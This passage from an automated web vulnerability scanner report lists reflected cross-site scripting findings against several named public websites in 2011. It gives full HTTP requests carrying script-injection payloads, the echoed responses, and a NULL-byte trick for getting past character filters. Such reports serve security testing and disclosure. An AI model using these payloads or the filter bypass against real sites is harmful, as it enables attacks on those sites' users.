The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cabd3"-alert(1)-"bf661f668f6d27ae7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /services/trends-load/format/jsoncabd3"-alert(1)-"bf661f668f6d27ae7?cat=&cnt=10&sort=share HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
Cache-Control: no-cache
Host: www.addthis.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Sat, 23 Apr 2011 03:55:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=baspi6erh86a90qbor3kb7c1i2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error</title>
<link
...[SNIP]...
<script type="text/javascript">
var u = "/services/trends-load/format/jsoncabd3"-alert(1)-"bf661f668f6d27ae7";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.128. http://www.addthis.com/services/trends-load/format/json [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/services/trends-load/format/json

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497e1"><script>alert(1)</script>89989283f6da8a95b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /services/trends-load/format/json497e1"><script>alert(1)</script>89989283f6da8a95b?cat=&cnt=10&sort=share HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
Cache-Control: no-cache
Host: www.addthis.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Sat, 23 Apr 2011 03:55:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=fk4dsp6ik4q54macicib5boc43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error</title>
<link
...[SNIP]...
<a href="/services/trends-load/format/json497e1"><script>alert(1)</script>89989283f6da8a95b">
...[SNIP]...

2.129. http://www.interop.com/lasvegas/conference/keynote-speakers.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.interop.com
Path:	/lasvegas/conference/keynote-speakers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a371e--><img%20src%3da%20onerror%3dalert(1)>607e55df309 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a371e--><img src=a onerror=alert(1)>607e55df309 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /lasvegas/conference/keynote-speakers.php/a371e--><img%20src%3da%20onerror%3dalert(1)>607e55df309 HTTP/1.1
Host: www.interop.com
Proxy-Connection: keep-alive
Referer: http://www.interop.com/lasvegas/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1303526931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme=lasvegas; s_cc=true; __utma=1.2049340075.1303526931.1303526931.1303526931.1; __utmc=1; __utmb=1.8.10.1303526931; __utmx=1.; __utmxx=1.; s_nr=1303526982965; s_lv=1303526982999; s_lv_s=First%20Visit; us_ubm_aut=3-8; s_sq=cmpglobalvista%3D%2526pid%253DAbout%252520Interop%252520%25257C%252520Interop%252520Las%252520Vegas%2525202011%25252C%252520May%2525208-12%25252C%2525202011%2526pidt%253D1%2526oid%253Dhttp%25253A//www.interop.com/lasvegas/conference/keynote-speakers.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 02:50:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: theme=lasvegas; expires=Mon, 25-Apr-2011 02:50:34 GMT; path=/; domain=www.interop.com
Connection: close
Content-Type: text/html
Content-Length: 73901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns
...[SNIP]...
<img src=a onerror=alert(1)>607e55df309.css
-->
...[SNIP]...

2.130. http://www.interop.com/lasvegas/conference/overview.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.interop.com
Path:	/lasvegas/conference/overview.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 96e87--><img%20src%3da%20onerror%3dalert(1)>f91dadf643b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96e87--><img src=a onerror=alert(1)>f91dadf643b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /lasvegas/conference/overview.php/96e87--><img%20src%3da%20onerror%3dalert(1)>f91dadf643b HTTP/1.1
Host: www.interop.com
Proxy-Connection: keep-alive
Referer: http://www.interop.com/lasvegas/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1303526931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme=lasvegas; s_cc=true; __utma=1.2049340075.1303526931.1303526931.1303526931.1; __utmc=1; __utmb=1.8.10.1303526931; __utmx=1.; __utmxx=1.; s_nr=1303526981756; s_lv=1303526981757; s_lv_s=First%20Visit; us_ubm_aut=3-7; s_sq=cmpglobalvista%3D%2526pid%253DAbout%252520Interop%252520%25257C%252520Interop%252520Las%252520Vegas%2525202011%25252C%252520May%2525208-12%25252C%2525202011%2526pidt%253D1%2526oid%253Dhttp%25253A//www.interop.com/lasvegas/conference/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 02:59:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: theme=lasvegas; expires=Mon, 25-Apr-2011 02:59:48 GMT; path=/; domain=www.interop.com
Connection: close
Content-Type: text/html
Content-Length: 603708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns
...[SNIP]...
<img src=a onerror=alert(1)>f91dadf643b.css
-->
...[SNIP]...

2.131. http://www.interop.com/lasvegas/it-expo/free-programs.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.interop.com
Path:	/lasvegas/it-expo/free-programs.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f55fe--><img%20src%3da%20onerror%3dalert(1)>25b4a395060 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f55fe--><img src=a onerror=alert(1)>25b4a395060 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /lasvegas/it-expo/free-programs.php/f55fe--><img%20src%3da%20onerror%3dalert(1)>25b4a395060 HTTP/1.1
Host: www.interop.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 02:49:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: theme=lasvegas; expires=Mon, 25-Apr-2011 02:49:30 GMT; path=/; domain=www.interop.com
Connection: close
Content-Type: text/html
Content-Length: 280956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns
...[SNIP]...
<img src=a onerror=alert(1)>25b4a395060.css
-->
...[SNIP]...

2.132. http://www.lasenza.com/eng/products/bras/pushup/lace-push-up-bra [115501-062/PMBOBO$10 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.lasenza.com
Path:	/eng/products/bras/pushup/lace-push-up-bra

Issue detail

The value of the 115501-062/PMBOBO$10 request parameter is copied into a JavaScript inline comment. The payload %001e438*/710983a7714 was submitted in the 115501-062/PMBOBO$10 parameter. This input was echoed as 1e438*/710983a7714 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /eng/products/bras/pushup/lace-push-up-bra?115501-062/PMBOBO$10%001e438*/710983a7714 HTTP/1.1
Host: www.lasenza.com
Proxy-Connection: keep-alive
Referer: http://www.lasenza.com/eng/gallery-PMBOBO$10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=9495856; CFTOKEN=885827c37587a43d-80AC5D35-E3FC-6306-D55139D2D600B849; JSESSIONID=2430c1fe135d44044c361e1b5844686f513eTR; LASENZAV7_COOKIEUKEY=98622911; LASENZAV7_COOKIESTOREID=26; LASENZAV7_COOKIELANGUAGEID=eng; LasenzaShopper=157623818.20480.0000; __utmz=100468099.1303533875.1.1.utmcsr=limitedbrands.com|utmccn=(referral)|utmcmd=referral|utmcct=/our_brands/la_senza/about.aspx; __utma=100468099.1715920141.1303533875.1303533875.1303533875.1; __utmc=100468099; __utmb=100468099.2.10.1303533875

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 23 Apr 2011 04:46:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: {ts '2011-04-23 00:46:11'}
Content-Language: en-CA
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 185553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
ref)
   {
       var framseSrc = "";
       if(who == 'popUpHolder')
           framseSrc = "/eng/emptyTemplateSection/redirect.cfm?sectionID=b2c/style/sendProductToFriend.cfm&itemID=115501-062&var=d&flagID=PMBOBO$10.1e438*/710983a7714&ckey=CA";
       else if(who == 'sizeChart')
           framseSrc = "/frontEndComponents/specificComponents/b2c/style/sizingGuru.cfm?itemId=115501-062&lang=eng"
       else if(who == 'currencyConverter')
           framseS
...[SNIP]...

2.133. http://www.lasenza.com/eng/products/bras/pushup/lace-push-up-bra [115501-062/PMBOBO$10 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.lasenza.com
Path:	/eng/products/bras/pushup/lace-push-up-bra

Issue detail

The value of the 115501-062/PMBOBO$10 request parameter is copied into a JavaScript rest-of-line comment. The payload %007ebab%0a54404f4f8c9 was submitted in the 115501-062/PMBOBO$10 parameter. This input was echoed as 7ebab
54404f4f8c9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /eng/products/bras/pushup/lace-push-up-bra?115501-062/PMBOBO$10%007ebab%0a54404f4f8c9 HTTP/1.1
Host: www.lasenza.com
Proxy-Connection: keep-alive
Referer: http://www.lasenza.com/eng/gallery-PMBOBO$10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=9495856; CFTOKEN=885827c37587a43d-80AC5D35-E3FC-6306-D55139D2D600B849; JSESSIONID=2430c1fe135d44044c361e1b5844686f513eTR; LASENZAV7_COOKIEUKEY=98622911; LASENZAV7_COOKIESTOREID=26; LASENZAV7_COOKIELANGUAGEID=eng; LasenzaShopper=157623818.20480.0000; __utmz=100468099.1303533875.1.1.utmcsr=limitedbrands.com|utmccn=(referral)|utmcmd=referral|utmcct=/our_brands/la_senza/about.aspx; __utma=100468099.1715920141.1303533875.1303533875.1303533875.1; __utmc=100468099; __utmb=100468099.2.10.1303533875

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 23 Apr 2011 04:46:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: {ts '2011-04-23 00:46:05'}
Content-Language: en-CA
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 185528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
ult);
       if(result=='TRUE')
       {
           openCoordinatesBag();
       }

       //document.location='/eng/checkout/redirect.cfm?sectionID=b2c/myAccount/userProfile_userLogin.cfm&chkOut=Y&var=d&flagID=PMBOBO$10.7ebab
54404f4f8c9&ckey=CA';
   }


   function ProductdetailsCheckout()
   {
        DWREngine._execute(_cfShoppingCartFunctions, null, 'ProductDetailsCheckout',ProductdetailsCheckout_Result);
   }

   function Produc
...[SNIP]...

2.134. http://www.lasenza.com/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm [itemId parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.lasenza.com
Path:	/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm

Issue detail

The value of the itemId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d0f3"><a>b1ac499a224 was submitted in the itemId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm?itemId=115501-0625d0f3"><a>b1ac499a224&price=26.5&lang=eng HTTP/1.1
Host: www.lasenza.com
Proxy-Connection: keep-alive
Referer: http://www.lasenza.com/eng/products/bras/pushup/lace-push-up-bra?115501-062/PMBOBO$10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=9495856; CFTOKEN=885827c37587a43d-80AC5D35-E3FC-6306-D55139D2D600B849; JSESSIONID=2430c1fe135d44044c361e1b5844686f513eTR; LASENZAV7_COOKIEUKEY=98622911; LASENZAV7_COOKIESTOREID=26; LASENZAV7_COOKIELANGUAGEID=eng; LasenzaShopper=157623818.20480.0000; __utmz=100468099.1303533875.1.1.utmcsr=limitedbrands.com|utmccn=(referral)|utmcmd=referral|utmcct=/our_brands/la_senza/about.aspx; __utma=100468099.1715920141.1303533875.1303533875.1303533875.1; __utmc=100468099; __utmb=100468099.3.10.1303533875

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 23 Apr 2011 04:45:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: {ts '2011-04-23 00:45:10'}
Content-Language: en-CA
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<title>Results</title>

<link HREF="http:
...[SNIP]...
<form class="clearfix" NAME="currency" ACTION="/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm?itemId=115501-0625d0f3"><a>b1ac499a224&price=26.5&lang=eng" METHOD="post">
...[SNIP]...

2.135. http://www.lasenza.com/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm [lang parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.lasenza.com
Path:	/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4e37"><a>f3e0de25554 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm?itemId=115501-062&price=26.5&lang=engd4e37"><a>f3e0de25554 HTTP/1.1
Host: www.lasenza.com
Proxy-Connection: keep-alive
Referer: http://www.lasenza.com/eng/products/bras/pushup/lace-push-up-bra?115501-062/PMBOBO$10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=9495856; CFTOKEN=885827c37587a43d-80AC5D35-E3FC-6306-D55139D2D600B849; JSESSIONID=2430c1fe135d44044c361e1b5844686f513eTR; LASENZAV7_COOKIEUKEY=98622911; LASENZAV7_COOKIESTOREID=26; LASENZAV7_COOKIELANGUAGEID=eng; LasenzaShopper=157623818.20480.0000; __utmz=100468099.1303533875.1.1.utmcsr=limitedbrands.com|utmccn=(referral)|utmcmd=referral|utmcct=/our_brands/la_senza/about.aspx; __utma=100468099.1715920141.1303533875.1303533875.1303533875.1; __utmc=100468099; __utmb=100468099.3.10.1303533875

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 23 Apr 2011 04:45:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: {ts '2011-04-23 00:45:22'}
Content-Language: en-CA
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<title>Results</title>

<link HREF="http:
...[SNIP]...
<form class="clearfix" NAME="currency" ACTION="/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm?itemId=115501-062&price=26.5&lang=engd4e37"><a>f3e0de25554" METHOD="post">
...[SNIP]...

2.136. http://www.lasenza.com/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.lasenza.com
Path:	/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a08f0"><a>9c7ab11f982 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm?itemId=115501-062&price=26.5&lang=eng&a08f0"><a>9c7ab11f982=1 HTTP/1.1
Host: www.lasenza.com
Proxy-Connection: keep-alive
Referer: http://www.lasenza.com/eng/products/bras/pushup/lace-push-up-bra?115501-062/PMBOBO$10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=9495856; CFTOKEN=885827c37587a43d-80AC5D35-E3FC-6306-D55139D2D600B849; JSESSIONID=2430c1fe135d44044c361e1b5844686f513eTR; LASENZAV7_COOKIEUKEY=98622911; LASENZAV7_COOKIESTOREID=26; LASENZAV7_COOKIELANGUAGEID=eng; LasenzaShopper=157623818.20480.0000; __utmz=100468099.1303533875.1.1.utmcsr=limitedbrands.com|utmccn=(referral)|utmcmd=referral|utmcct=/our_brands/la_senza/about.aspx; __utma=100468099.1715920141.1303533875.1303533875.1303533875.1; __utmc=100468099; __utmb=100468099.3.10.1303533875

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 23 Apr 2011 04:46:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: {ts '2011-04-23 00:46:11'}
Content-Language: en-CA
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7788

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<title>Results</title>

<link HREF="http:
...[SNIP]...
<form class="clearfix" NAME="currency" ACTION="/frontEndComponents/specificComponents/b2c/style/currencyConverter.cfm?itemId=115501-062&price=26.5&lang=eng&a08f0"><a>9c7ab11f982=1" METHOD="post">
...[SNIP]...

2.137. http://searchportal.information.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://searchportal.information.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b63b4'%3balert(1)//61ffbe521aa was submitted in the Referer HTTP header. This input was echoed as b63b4';alert(1)//61ffbe521aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?o_id=156525&domainname=4square.com HTTP/1.1
Host: searchportal.information.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b63b4'%3balert(1)//61ffbe521aa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Spusr=3c0015ac7aa04db0cb851936

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=99
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: 4square.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303531329%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Sun, 24-Apr-2011 04:02:09 GMT
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303531329%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Avszwvvqxquxrtxts; path=/; expires=Sun, 24-Apr-2011 04:02:09 GMT
Set-Cookie: Spusr=3c0015ac7aa04db0cb851936; path=/; expires=Mon, 22-Apr-2013 04:02:09 GMT
Content-Length: 66031

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head> <title> 4square.com </title>
<meta http-equiv="Keywords" content
...[SNIP]...
gle_afd_request = {
channel: '000939',
client: 'ca-dp-oversee12_3ph_xml',
domain_name: '4square.com',
ref: 'http://www.google.com/search?hl=en&q=b63b4';alert(1)//61ffbe521aa',
hl: 'en',
q: '',

num_ads: '6',

afdt: afdt,
token: afdt,
adext:
...[SNIP]...

2.138. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb105"><script>alert(1)</script>5590ae680b0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

